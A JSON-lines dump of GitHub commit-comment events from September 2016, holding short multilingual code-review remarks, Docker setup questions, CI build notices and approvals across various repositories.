{"id":"4628040270","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200974,"position":null,"line":null,"path":null,"commit_id":"2b34e4b0543799ae6fcf8e4703911b04d0b70004","created_at":"2016-09-28T01:54:39Z","updated_at":"2016-09-28T01:54:39Z","body":"これは何のコミットですか？w"}},"created_at":"2016-09-28T01:54:39Z"}
{"id":"4628041858","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200979,"position":28,"line":28,"path":"app/controllers/blogs_controller.rb","commit_id":"d029927c3b2ae296362d6e7cd338c2bde02ae88f","created_at":"2016-09-28T01:55:12Z","updated_at":"2016-09-28T01:55:12Z","body":"不要な空行です。"}},"created_at":"2016-09-28T01:55:12Z"}
{"id":"4628043249","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200985,"position":63,"line":63,"path":"config/database.yml","commit_id":"d029927c3b2ae296362d6e7cd338c2bde02ae88f","created_at":"2016-09-28T01:55:43Z","updated_at":"2016-09-28T01:55:43Z","body":"不要なコメント行は削除しておきましょう。"}},"created_at":"2016-09-28T01:55:43Z"}
{"id":"4628047434","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19201001,"position":4,"line":153,"path":"src/main/scala/main.scala","commit_id":"f8ee99c1c0e2c7c9b5ea9635657f2410d2b24e38","created_at":"2016-09-28T01:57:10Z","updated_at":"2016-09-28T01:57:10Z","body":"This is a thread in a different commit."}},"created_at":"2016-09-28T01:57:10Z"}
{"id":"4628048233","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19201002,"position":4,"line":153,"path":"src/main/scala/main.scala","commit_id":"f8ee99c1c0e2c7c9b5ea9635657f2410d2b24e38","created_at":"2016-09-28T01:57:27Z","updated_at":"2016-09-28T01:57:27Z","body":"Yup I agree. 🍺 "}},"created_at":"2016-09-28T01:57:27Z"}
{"id":"4628049450","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mat-mr/crescer-2016-2"},"payload":{"comment":{"id":19201005,"position":null,"line":null,"path":null,"commit_id":"50aaf645fd0105e60fdea6efdeddc599813c6de6","created_at":"2016-09-28T01:57:54Z","updated_at":"2016-09-28T01:57:54Z","body":"Legal 👍 "}},"created_at":"2016-09-28T01:57:54Z"}
{"id":"4628049589","type":"CommitCommentEvent","actor":{"login":"dare0021"},"repo":{"name":"dare0021/Bork"},"payload":{"comment":{"id":19201006,"position":null,"line":null,"path":null,"commit_id":"a6c659bb7e8a2308b454856e34436e16bac90596","created_at":"2016-09-28T01:57:57Z","updated_at":"2016-09-28T01:57:57Z","body":"From:\r\nhttps://gist.github.com/kmorcinek/2710267"}},"created_at":"2016-09-28T01:57:57Z"}
{"id":"4628051440","type":"CommitCommentEvent","actor":{"login":"doesdev"},"repo":{"name":"doesdev/jquery-video-lightning"},"payload":{"comment":{"id":19201009,"position":null,"line":null,"path":null,"commit_id":"ac485df1efb5269868f975b79b4cf6b959fce397","created_at":"2016-09-28T01:58:33Z","updated_at":"2016-09-28T01:58:33Z","body":"I appreciate the kind words. I need to do some maintenance on this library (i.e. replace the coffeescript with js and get a proper build on NPM). I'm not sure how soon I'll be able to get to that, but once I make those changes I'll implement Youtube's updated API methods for playlist access."}},"created_at":"2016-09-28T01:58:33Z"}
{"id":"4628052620","type":"CommitCommentEvent","actor":{"login":"moshechaikin"},"repo":{"name":"moshechaikin/TAScience"},"payload":{"comment":{"id":19201014,"position":null,"line":null,"path":null,"commit_id":"5ad64778605a38daf871dd55ea46a544f3a2e383","created_at":"2016-09-28T01:58:58Z","updated_at":"2016-09-28T01:58:58Z","body":"Enough with the golem!"}},"created_at":"2016-09-28T01:58:58Z"}
{"id":"4628053333","type":"CommitCommentEvent","actor":{"login":"YDixler"},"repo":{"name":"moshechaikin/TAScience"},"payload":{"comment":{"id":19201017,"position":null,"line":null,"path":null,"commit_id":"5ad64778605a38daf871dd55ea46a544f3a2e383","created_at":"2016-09-28T01:59:15Z","updated_at":"2016-09-28T01:59:15Z","body":"From now on we are 'serious\"\r\n"}},"created_at":"2016-09-28T01:59:15Z"}
{"id":"4628053742","type":"CommitCommentEvent","actor":{"login":"moshechaikin"},"repo":{"name":"moshechaikin/TAScience"},"payload":{"comment":{"id":19201018,"position":null,"line":null,"path":null,"commit_id":"5ad64778605a38daf871dd55ea46a544f3a2e383","created_at":"2016-09-28T01:59:24Z","updated_at":"2016-09-28T01:59:24Z","body":"let's do it"}},"created_at":"2016-09-28T01:59:24Z"}
{"id":"4629666370","type":"CommitCommentEvent","actor":{"login":"rob-c"},"repo":{"name":"ganga-devs/ganga"},"payload":{"comment":{"id":19205012,"position":4,"line":207,"path":"python/Ganga/GPIDev/Adapters/IGangaFile.py","commit_id":"906feb0c7b8910feb511cb412d437ec9bdfcfdcb","created_at":"2016-09-28T10:00:26Z","updated_at":"2016-09-28T10:00:26Z","body":"Good catch, still in development. Will fix when i get a chance ."}},"created_at":"2016-09-28T10:00:26Z"}
{"id":"4629670870","type":"CommitCommentEvent","actor":{"login":"GabrielTK"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19205022,"position":null,"line":null,"path":null,"commit_id":"43da54f8dcdd4776d6dcd65916f6c63a1a1a80fd","created_at":"2016-09-28T10:01:18Z","updated_at":"2016-09-28T10:01:18Z","body":"\r\n\r\nSo why they are in the Docker Setup instructions??\r\n\r\n> Em 28 de set de 2016, às 06:59, Cronick <notifications@github.com> escreveu:\r\n> \r\n> run-linux.sh has not been a part of the repository for a few updates.\r\n> Those files got uploaded into the repository by mistake.\r\n> \r\n> —\r\n> You are receiving this because you commented.\r\n> Reply to this email directly, view it on GitHub, or mute the thread.\r\n> \r\n"}},"created_at":"2016-09-28T10:01:18Z"}
{"id":"4629674694","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205029,"position":38,"line":38,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:01:57Z","updated_at":"2016-09-28T10:01:57Z","body":"зачем привязка к блоку? хлебные крошки только в промо могут быть?"}},"created_at":"2016-09-28T10:01:57Z"}
{"id":"4629675977","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205033,"position":39,"line":39,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:02:12Z","updated_at":"2016-09-28T10:02:12Z","body":"просто спаны, а не ссылки?"}},"created_at":"2016-09-28T10:02:12Z"}
{"id":"4629679390","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205044,"position":42,"line":42,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:02:53Z","updated_at":"2016-09-28T10:02:53Z","body":"лишний пробел)"}},"created_at":"2016-09-28T10:02:53Z"}
{"id":"4629681521","type":"CommitCommentEvent","actor":{"login":"KrisBoonefaes"},"repo":{"name":"icapps/ios-faro"},"payload":{"comment":{"id":19205047,"position":5,"line":20,"path":"Sources/JSONReader.swift","commit_id":"35594f28112e4bdeab8885e4acdae318fa78184e","created_at":"2016-09-28T10:03:17Z","updated_at":"2016-09-28T10:03:17Z","body":"🖕 Use printError from ErrorPrinting.swift"}},"created_at":"2016-09-28T10:03:17Z"}
{"id":"4629682288","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205051,"position":46,"line":46,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:03:27Z","updated_at":"2016-09-28T10:03:27Z","body":"есть автоматические выравниватели кода в редакторах) Мы перфекционисты"}},"created_at":"2016-09-28T10:03:27Z"}
{"id":"4629682908","type":"CommitCommentEvent","actor":{"login":"Cronick"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19205054,"position":null,"line":null,"path":null,"commit_id":"43da54f8dcdd4776d6dcd65916f6c63a1a1a80fd","created_at":"2016-09-28T10:03:34Z","updated_at":"2016-09-28T10:03:34Z","body":"The Docker Setup instructions-part has not been updated since I guess."}},"created_at":"2016-09-28T10:03:34Z"}
{"id":"4629684431","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19205058,"position":null,"line":null,"path":null,"commit_id":"817cdbbf850a7be10f85841b118f1b4feb5177b9","created_at":"2016-09-28T10:03:53Z","updated_at":"2016-09-28T10:03:53Z","body":"No luck with the test but I need to improve on this, will try something soon..."}},"created_at":"2016-09-28T10:03:53Z"}
{"id":"4629686818","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205066,"position":56,"line":56,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:04:20Z","updated_at":"2016-09-28T10:04:20Z","body":"зачем лишняя обёртка?"}},"created_at":"2016-09-28T10:04:20Z"}
{"id":"4629686932","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19205067,"position":null,"line":null,"path":null,"commit_id":"5453ce67102b02030bf74e050285798447c1a00a","created_at":"2016-09-28T10:04:21Z","updated_at":"2016-09-28T10:04:21Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 275](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1249&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:27:30"}},"created_at":"2016-09-28T10:04:21Z"}
{"id":"4629688781","type":"CommitCommentEvent","actor":{"login":"moleisking"},"repo":{"name":"moleisking/SAM"},"payload":{"comment":{"id":19205074,"position":null,"line":null,"path":null,"commit_id":"4b748139fce911da21abbf4dede080d0f6f0e9d9","created_at":"2016-09-28T10:04:43Z","updated_at":"2016-09-28T10:04:43Z","body":"Well then I need a call to update users\n\nOn 28 Sep 2016 10:58, \"goodbytes23\" <notifications@github.com> wrote:\n\n> Yep, for sure, but not on the registration page, right?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/moleisking/SAM/commit/4b748139fce911da21abbf4dede080d0f6f0e9d9#commitcomment-19204258>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADPVJHTAcSc9xEzc4y40ArNi0NShFBexks5quiwwgaJpZM4KIBWv>\n> .\n>\n"}},"created_at":"2016-09-28T10:04:43Z"}
{"id":"4629689420","type":"CommitCommentEvent","actor":{"login":"SteveDaulton"},"repo":{"name":"audacity/audacity"},"payload":{"comment":{"id":19205075,"position":null,"line":null,"path":null,"commit_id":"950f62a5488f7d0e53c986ba57f18a759efaa384","created_at":"2016-09-28T10:04:51Z","updated_at":"2016-09-28T10:04:51Z","body":"This causes incorrect focus when opening effect (tested on Debian Linux Xfce), and Alt+F6 when in a modeless window (incorrectly) tabs through the controls of that window.\r\nDiscussion here: http://audacity.238276.n2.nabble.com/Incorrect-focus-when-opening-effects-td7576205.html"}},"created_at":"2016-09-28T10:04:51Z"}
{"id":"4629691375","type":"CommitCommentEvent","actor":{"login":"davecheney"},"repo":{"name":"davecheney/httpstat"},"payload":{"comment":{"id":19205079,"position":null,"line":null,"path":null,"commit_id":"0e404c5254e04ac7dbe482c51483dd14c016e590","created_at":"2016-09-28T10:05:17Z","updated_at":"2016-09-28T10:05:17Z","body":"/cc @mattn please confirm this hasn't broken Windows."}},"created_at":"2016-09-28T10:05:17Z"}
{"id":"4629693755","type":"CommitCommentEvent","actor":{"login":"moleisking"},"repo":{"name":"moleisking/SAM"},"payload":{"comment":{"id":19205085,"position":null,"line":null,"path":null,"commit_id":"4b748139fce911da21abbf4dede080d0f6f0e9d9","created_at":"2016-09-28T10:05:47Z","updated_at":"2016-09-28T10:05:47Z","body":"Users should have a id field to for connections to other tables.  Also do\nyou have mongodb installed?\n\nOn 28 Sep 2016 12:04, \"Scott Johnston\" <moleisking@googlemail.com> wrote:\n\n> Well then I need a call to update users\n>\n> On 28 Sep 2016 10:58, \"goodbytes23\" <notifications@github.com> wrote:\n>\n>> Yep, for sure, but not on the registration page, right?\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/moleisking/SAM/commit/4b748139fce911da21abbf4dede080d0f6f0e9d9#commitcomment-19204258>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ADPVJHTAcSc9xEzc4y40ArNi0NShFBexks5quiwwgaJpZM4KIBWv>\n>> .\n>>\n>\n"}},"created_at":"2016-09-28T10:05:47Z"}
{"id":"4629694998","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205088,"position":68,"line":68,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:06:02Z","updated_at":"2016-09-28T10:06:02Z","body":"логичнее через `input[type=\"number\"]` реализовать, как думаешь?"}},"created_at":"2016-09-28T10:06:02Z"}
{"id":"4629695449","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19205089,"position":null,"line":null,"path":null,"commit_id":"25d30e342aee733e207933f84fbee7a6f97a1b02","created_at":"2016-09-28T10:06:08Z","updated_at":"2016-09-28T10:06:08Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 276](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1250&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T10:06:08Z"}
{"id":"4629697198","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19205090,"position":null,"line":null,"path":null,"commit_id":"a8bdc2e654f4fa0577d4bc46c37479ac0196f831","created_at":"2016-09-28T10:06:29Z","updated_at":"2016-09-28T10:06:29Z","body":"@nanosoldier `runbenchmarks(ALL, vs = \"@3d8b39b54bc92b18b0fa915f1e462f82afa2e920\")`\r\n"}},"created_at":"2016-09-28T10:06:29Z"}
{"id":"4629697250","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205091,"position":77,"line":77,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:06:30Z","updated_at":"2016-09-28T10:06:30Z","body":"должна быть ссылка"}},"created_at":"2016-09-28T10:06:30Z"}
{"id":"4629701085","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19205097,"position":null,"line":null,"path":null,"commit_id":"a8bdc2e654f4fa0577d4bc46c37479ac0196f831","created_at":"2016-09-28T10:07:18Z","updated_at":"2016-09-28T10:07:18Z","body":"hmm seems it was already run on this commit: https://github.com/JuliaLang/julia/pull/18493#commitcomment-19124251"}},"created_at":"2016-09-28T10:07:18Z"}
{"id":"4629703308","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":19205101,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-28T10:07:48Z","updated_at":"2016-09-28T10:07:48Z","body":"я нашел откуда это))) https://github.com/nx511j-multirom/android_device_nubia_nx511j/commit/08a17a746497c1e618757fe63e0f77f4a31c1875"}},"created_at":"2016-09-28T10:07:48Z"}
{"id":"4629705631","type":"CommitCommentEvent","actor":{"login":"not-fl3"},"repo":{"name":"ozkriff/zoc"},"payload":{"comment":{"id":19205105,"position":5,"line":14,"path":"src/visualizer.rs","commit_id":"656e1ef07fb5a3e650586cb362651e2d483f34c5","created_at":"2016-09-28T10:08:14Z","updated_at":"2016-09-28T10:08:14Z","body":":+1: "}},"created_at":"2016-09-28T10:08:14Z"}
{"id":"4629709414","type":"CommitCommentEvent","actor":{"login":"harley"},"repo":{"name":"supersteeb/csblog"},"payload":{"comment":{"id":19205113,"position":7,"line":12,"path":"app/controllers/articles_controller.rb","commit_id":"e1f67c264528c519203ee665a5fdc3dcf81d1ee5","created_at":"2016-09-28T10:09:01Z","updated_at":"2016-09-28T10:09:01Z","body":"you don't need line 7 if you have this `if else end` block"}},"created_at":"2016-09-28T10:09:01Z"}
{"id":"4629709476","type":"CommitCommentEvent","actor":{"login":"ramireddym"},"repo":{"name":"ramireddym/SeleniumAutomationscripts_basic-"},"payload":{"comment":{"id":19205114,"position":null,"line":null,"path":null,"commit_id":"e5cd0cc1c79612a3bfbad0f57979e307f393394e","created_at":"2016-09-28T10:09:02Z","updated_at":"2016-09-28T10:09:02Z","body":"160by2 web site code"}},"created_at":"2016-09-28T10:09:02Z"}
{"id":"4629709692","type":"CommitCommentEvent","actor":{"login":"GabrielTK"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19205116,"position":null,"line":null,"path":null,"commit_id":"1d0aad00edb3e961026ceb1fc278a9e9f8772ac5","created_at":"2016-09-28T10:09:05Z","updated_at":"2016-09-28T10:09:05Z","body":"Sorry again: I think before running this we need to run something like this:\r\n```docker run --name -t -i -p 3000:3000pogoserver```\r\nSorry for being to perfeccionist. 😄 "}},"created_at":"2016-09-28T10:09:05Z"}
{"id":"4629712464","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205122,"position":43,"line":43,"path":"index.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:09:41Z","updated_at":"2016-09-28T10:09:41Z","body":"почему таблица?"}},"created_at":"2016-09-28T10:09:41Z"}
{"id":"4629713394","type":"CommitCommentEvent","actor":{"login":"harley"},"repo":{"name":"supersteeb/csblog"},"payload":{"comment":{"id":19205123,"position":2,"line":2,"path":"app/models/article.rb","commit_id":"e1f67c264528c519203ee665a5fdc3dcf81d1ee5","created_at":"2016-09-28T10:09:53Z","updated_at":"2016-09-28T10:09:53Z","body":"use 2 spaces for intentation :) check https://github.com/styleguide/ruby/coding-style"}},"created_at":"2016-09-28T10:09:53Z"}
{"id":"4629713786","type":"CommitCommentEvent","actor":{"login":"changtengfei"},"repo":{"name":"openwsn-berkeley/openwsn-fw"},"payload":{"comment":{"id":19205124,"position":null,"line":null,"path":null,"commit_id":"6146abe57e7ebdb8bb3ef60d69c754dfdf3d02a8","created_at":"2016-09-28T10:09:58Z","updated_at":"2016-09-28T10:09:58Z","body":"@JRubis you are absolutely right! so the fix should be clear both flag right after the packet are removed, right?"}},"created_at":"2016-09-28T10:09:58Z"}
{"id":"4629714544","type":"CommitCommentEvent","actor":{"login":"sesho777"},"repo":{"name":"peliculas25/peliculas"},"payload":{"comment":{"id":19205125,"position":null,"line":null,"path":null,"commit_id":"638e96a132aa11f0986202c21cd5e6e9b0483b9b","created_at":"2016-09-28T10:10:07Z","updated_at":"2016-09-28T10:10:07Z","body":"rm -r peliculas"}},"created_at":"2016-09-28T10:10:07Z"}
{"id":"4629715229","type":"CommitCommentEvent","actor":{"login":"guddo"},"repo":{"name":"easySuite/ding2"},"payload":{"comment":{"id":19205126,"position":null,"line":null,"path":null,"commit_id":"237c8bd5a53fe75568fdc9b31f4957ee0b7d1ccf","created_at":"2016-09-28T10:10:15Z","updated_at":"2016-09-28T10:10:15Z","body":"@JrgenGNielsen Can you explain this?"}},"created_at":"2016-09-28T10:10:15Z"}
{"id":"4629716444","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205129,"position":50,"line":50,"path":"index.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:10:30Z","updated_at":"2016-09-28T10:10:30Z","body":"больше на псевдоэлемент смахивает..."}},"created_at":"2016-09-28T10:10:30Z"}
{"id":"4629717059","type":"CommitCommentEvent","actor":{"login":"timwis"},"repo":{"name":"CodeForPhilly/stately"},"payload":{"comment":{"id":19205130,"position":8,"line":15,"path":"server/src/stately/views.py","commit_id":"238e7d5b28052837e4d2e51d973776a8da1c3363","created_at":"2016-09-28T10:10:38Z","updated_at":"2016-09-28T10:10:38Z","body":"Clever way to do this!"}},"created_at":"2016-09-28T10:10:38Z"}
{"id":"4629721165","type":"CommitCommentEvent","actor":{"login":"GabrielTK"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":19205137,"position":null,"line":null,"path":null,"commit_id":"1d0aad00edb3e961026ceb1fc278a9e9f8772ac5","created_at":"2016-09-28T10:11:26Z","updated_at":"2016-09-28T10:11:26Z","body":"And there is also OpenSSH being installed at Docker file. I think it is there by accident too 😄 "}},"created_at":"2016-09-28T10:11:26Z"}
{"id":"4629721206","type":"CommitCommentEvent","actor":{"login":"timwis"},"repo":{"name":"CodeForPhilly/stately"},"payload":{"comment":{"id":19205138,"position":6,"line":30,"path":"server/src/stately/views.py","commit_id":"470041b6acbd24fd4c3bce56134c30e89525b932","created_at":"2016-09-28T10:11:27Z","updated_at":"2016-09-28T10:11:27Z","body":"Whaaaat! I didn't know you could do multiline comprehensions like this"}},"created_at":"2016-09-28T10:11:27Z"}
{"id":"4629721291","type":"CommitCommentEvent","actor":{"login":"harley"},"repo":{"name":"supersteeb/csblog"},"payload":{"comment":{"id":19205139,"position":3,"line":3,"path":"app/models/article.rb","commit_id":"e1f67c264528c519203ee665a5fdc3dcf81d1ee5","created_at":"2016-09-28T10:11:28Z","updated_at":"2016-09-28T10:11:28Z","body":"this line becomes useless because the result is not used because you only return the results in the next line.\r\nyou can search by either title or body by replacing line 3-4 with `.where(\"title ILIKE ? OR body ILIKE ?\", \"%{search}%\", \"%{search}%\")`"}},"created_at":"2016-09-28T10:11:28Z"}
{"id":"4629722567","type":"CommitCommentEvent","actor":{"login":"ag91"},"repo":{"name":"tomjridge/isa_btree"},"payload":{"comment":{"id":19205143,"position":35,"line":67,"path":"src/Key_value.thy","commit_id":"eb325ffd3610ad090fbfe1c110d68be3bed4df3b","created_at":"2016-09-28T10:11:44Z","updated_at":"2016-09-28T10:11:44Z","body":"I defined key_le in this weird manner (i.e., through key_eq) to avoid problems with the scala code generation (since keys can be infinite types op = may not be defined)."}},"created_at":"2016-09-28T10:11:44Z"}
{"id":"4629725871","type":"CommitCommentEvent","actor":{"login":"jdecool"},"repo":{"name":"flochntrl/docker"},"payload":{"comment":{"id":19205150,"position":6,"line":6,"path":"symfony2/docker-compose.yml","commit_id":"1d9e753f23aeb025293539116a1cb6ffb0caf29e","created_at":"2016-09-28T10:12:26Z","updated_at":"2016-09-28T10:12:26Z","body":"Il manque ce dossier sur le dépôt ;)"}},"created_at":"2016-09-28T10:12:26Z"}
{"id":"4629727981","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205153,"position":10,"line":10,"path":"sass/basket-promo.scss","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:12:54Z","updated_at":"2016-09-28T10:12:54Z","body":"а где альтернативные шрифты и где семейство шрифтов?"}},"created_at":"2016-09-28T10:12:54Z"}
{"id":"4629728646","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205156,"position":26,"line":26,"path":"sass/basket-promo.scss","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:13:04Z","updated_at":"2016-09-28T10:13:04Z","body":"отступы"}},"created_at":"2016-09-28T10:13:04Z"}
{"id":"4629733692","type":"CommitCommentEvent","actor":{"login":"mattn"},"repo":{"name":"davecheney/httpstat"},"payload":{"comment":{"id":19205162,"position":null,"line":null,"path":null,"commit_id":"0e404c5254e04ac7dbe482c51483dd14c016e590","created_at":"2016-09-28T10:14:09Z","updated_at":"2016-09-28T10:14:09Z","body":"Yes, this is right."}},"created_at":"2016-09-28T10:14:09Z"}
{"id":"4629740956","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205167,"position":114,"line":114,"path":"sass/basket.scss","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:15:44Z","updated_at":"2016-09-28T10:15:44Z","body":"очень много повторяющихся свойств для элементов блока. Сложно рефакторить, многое могут наследоваться из дочерних блоков"}},"created_at":"2016-09-28T10:15:44Z"}
{"id":"4629741862","type":"CommitCommentEvent","actor":{"login":"davecheney"},"repo":{"name":"davecheney/httpstat"},"payload":{"comment":{"id":19205169,"position":null,"line":null,"path":null,"commit_id":"0e404c5254e04ac7dbe482c51483dd14c016e590","created_at":"2016-09-28T10:15:56Z","updated_at":"2016-09-28T10:15:56Z","body":"Thanks for checking."}},"created_at":"2016-09-28T10:15:56Z"}
{"id":"4629743305","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19205171,"position":164,"line":164,"path":"sass/basket.scss","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T10:16:15Z","updated_at":"2016-09-28T10:16:15Z","body":"после двоеточий — пробел"}},"created_at":"2016-09-28T10:16:15Z"}
{"id":"4629746765","type":"CommitCommentEvent","actor":{"login":"pallavi-rao"},"repo":{"name":"InMobi/falcon"},"payload":{"comment":{"id":19205179,"position":12,"line":98,"path":"common/src/main/java/org/apache/falcon/metrics/MetricNotificationService.java","commit_id":"394fbacca159ffbb7aa0d9f1a654665e658feeeb","created_at":"2016-09-28T10:17:03Z","updated_at":"2016-09-28T10:17:03Z","body":"Nit : call it deleteMetric"}},"created_at":"2016-09-28T10:17:03Z"}
{"id":"4629749268","type":"CommitCommentEvent","actor":{"login":"yusuke"},"repo":{"name":"yusuke/phpstormdemo0928"},"payload":{"comment":{"id":19205186,"position":5,"line":0,"path":"Person.php","commit_id":"fc35fd338b758a3049f47224de6333468ac45622","created_at":"2016-09-28T10:17:36Z","updated_at":"2016-09-28T10:17:36Z","body":"ほげ"}},"created_at":"2016-09-28T10:17:36Z"}
{"id":"4629749875","type":"CommitCommentEvent","actor":{"login":"danielsamuels"},"repo":{"name":"onespacemedia/project-template"},"payload":{"comment":{"id":19205188,"position":46,"line":89,"path":"hooks/post_gen_project.sh","commit_id":"e8366623b9bd09428a6ebdae5dc4829e64c50e7d","created_at":"2016-09-28T10:17:45Z","updated_at":"2016-09-28T10:17:45Z","body":"You want to move this to before the `git flow init -d` line, otherwise the 2nd commit of a project will always be 'Removed pre-push file', as to Git the file is disappearing."}},"created_at":"2016-09-28T10:17:45Z"}
{"id":"4629752898","type":"CommitCommentEvent","actor":{"login":"Nonouf"},"repo":{"name":"SVGKit/SVGKit"},"payload":{"comment":{"id":19205198,"position":14,"line":161,"path":"Source/DOM classes/SVG-DOM/SVGLength.m","commit_id":"6045d38f17bfe4ff5b69fe35633ef961fce02891","created_at":"2016-09-28T10:18:25Z","updated_at":"2016-09-28T10:18:25Z","body":"There is a typo error here making the build fail. Should be `[[platform hasPrefix:@\"iPhone9,4\"]`."}},"created_at":"2016-09-28T10:18:25Z"}
{"id":"4629755696","type":"CommitCommentEvent","actor":{"login":"pallavi-rao"},"repo":{"name":"InMobi/falcon"},"payload":{"comment":{"id":19205208,"position":9,"line":124,"path":"prism/src/main/java/org/apache/falcon/service/BacklogMetricEmitterService.java","commit_id":"394fbacca159ffbb7aa0d9f1a654665e658feeeb","created_at":"2016-09-28T10:19:05Z","updated_at":"2016-09-28T10:19:05Z","body":"Nit : dropMetric is better."}},"created_at":"2016-09-28T10:19:05Z"}
{"id":"4629757877","type":"CommitCommentEvent","actor":{"login":"jenshnielsen"},"repo":{"name":"UCL/rsd-engineeringcourse"},"payload":{"comment":{"id":19205215,"position":4,"line":28,"path":".travis.yml","commit_id":"0b033e81629960909792318ebad6f95f05cae033","created_at":"2016-09-28T10:19:32Z","updated_at":"2016-09-28T10:19:32Z","body":"This probably won't work because Matplotlib 1.5.X where X is 1,2,3 explicitly disables font caching on Travis. \r\nI suggest either installing Matplotlib 1.5.0 or do the above and install the latest beta of 2.0 (pip install matplotlib --pre) which works correctly"}},"created_at":"2016-09-28T10:19:32Z"}
{"id":"4629758456","type":"CommitCommentEvent","actor":{"login":"pallavi-rao"},"repo":{"name":"InMobi/falcon"},"payload":{"comment":{"id":19205218,"position":null,"line":null,"path":null,"commit_id":"394fbacca159ffbb7aa0d9f1a654665e658feeeb","created_at":"2016-09-28T10:19:40Z","updated_at":"2016-09-28T10:19:40Z","body":"Apart from minor nits, +1"}},"created_at":"2016-09-28T10:19:40Z"}
